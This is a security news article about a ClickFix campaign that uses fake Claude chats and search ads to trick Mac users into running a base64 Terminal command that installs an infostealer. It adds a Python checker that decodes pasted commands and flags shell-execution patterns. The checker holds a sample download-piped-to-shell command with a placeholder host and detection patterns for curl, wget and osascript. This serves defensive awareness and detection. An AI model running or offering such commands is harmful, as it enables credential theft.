Fake Claude Search Results Lure Mac Users into ClickFix Attack
Attackers are using sponsored Google search results and shared Claude chats to deliver a ClickFix social-engineering attack targeting macOS users, leading to credential theft.

Cybercriminals are exploiting the popularity of Anthropic's Claude AI assistant by luring Mac users into a ClickFix attack through sponsored Google search results and shared Claude chats. Researchers at Malwarebytes discovered that when users search for terms like 'Claude Mac download,' they may see sponsored ads that appear to lead to the legitimate claude.ai domain. Instead, these ads redirect to real Claude shared chats designed to look like official 'Claude Code on Mac' or Apple Support guides.
The attack relies on the ClickFix social engineering method, which tricks users into infecting their own devices by running malicious commands. The fake support guides instruct victims to open Terminal and paste a base64-encoded command. This command downloads a loader shell script from attacker-controlled infrastructure and executes it in memory. The script then profiles the system, pulls down a second-stage payload, and runs it via osascript, macOS's built-in scripting engine. This grants the attacker remote code execution (RCE) without dropping a traditional application or binary.
The final payload is similar to the MacSync infostealer, which harvests browser credentials, cookies, Keychain contents, and crypto wallet data. All stolen information is bundled and exfiltrated over HTTP to attacker servers. Independent research by BleepingComputer confirmed another shared chat serving the same purpose, indicating an active campaign.
macOS Tahoe 26.4 and later include warnings about possible ClickFix attacks, but users on older versions remain vulnerable. Malwarebytes advises users to slow down and avoid rushing to follow instructions on webpages, especially those asking to run commands. Attackers often use urgency tactics like countdowns or user counters to bypass critical thinking.
To stay safe, users should never run code or commands copied from untrusted sources. Verify instructions independently through official documentation or support channels. Manually typing commands instead of copy-pasting can reduce the risk of hidden malicious payloads. Using up-to-date anti-malware solutions with web protection, such as Malwarebytes, can block connections to malicious sites. The free Malwarebytes Browser Guard extension warns when a website tries to copy something to the clipboard, adding an extra layer of defense.
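As an added illustration (not code from Malwarebytes or the original article), the Python below shows one way to inspect a copied command before it reaches Terminal: it decodes nested base64 and flags the decode-to-shell, download-to-shell and osascript patterns described above. The regexes, function names and the example.invalid sample are assumptions constructed for this example.

```python
import base64
import re

# Base64 runs long enough to hide a command.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# Illustrative patterns (assumptions) for the behaviours the article describes.
INDICATORS = {
    "decode-and-execute": re.compile(r"base64\s+(-d|-D|--decode)\b.*\|\s*(ba|z)?sh\b", re.S),
    "download-piped-to-shell": re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|z)?sh\b"),
    "network-fetch": re.compile(r"\b(curl|wget)\b"),
    "osascript-execution": re.compile(r"\bosascript\b"),
}


def decode_layers(text, max_depth=3):
    """Return [(depth, text)] for the input and each nested base64 payload."""
    layers, frontier = [(0, text)], [text]
    for depth in range(1, max_depth + 1):
        found = []
        for layer in frontier:
            for run in B64_RUN.findall(layer):
                try:
                    decoded = base64.b64decode(run + "=" * (-len(run) % 4), validate=True).decode()
                except ValueError:  # not base64, or not text once decoded
                    continue
                if all(ch.isprintable() or ch in "\n\t" for ch in decoded):
                    found.append(decoded)
        layers += [(depth, d) for d in found]
        frontier = found
    return layers


def inspect_pasted_command(command):
    """Return sorted (depth, indicator) pairs; an empty list means no match."""
    hits = set()
    for depth, layer in decode_layers(command):
        for name, pattern in INDICATORS.items():
            if pattern.search(layer):
                hits.add((depth, name))
    return sorted(hits)


# Constructed samples: the host is a placeholder and nothing is executed.
SAMPLE_DECODED = "curl -s https://example.invalid/loader.sh | zsh"
SAMPLE_LURE = "echo '%s' | base64 -D | zsh" % base64.b64encode(SAMPLE_DECODED.encode()).decode()
SAMPLE_BENIGN = "softwareupdate --list"

if __name__ == "__main__":
    print(inspect_pasted_command(SAMPLE_LURE), inspect_pasted_command(SAMPLE_BENIGN))
```

A match is a reason to stop and verify the instructions through official channels; an empty result does not show that a command is safe.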
This campaign highlights the evolving sophistication of ClickFix attacks, which now leverage AI brand popularity and search engine ads to reach victims. As AI tools become more integrated into workflows, users must remain vigilant against social engineering tactics that exploit trust in well-known brands.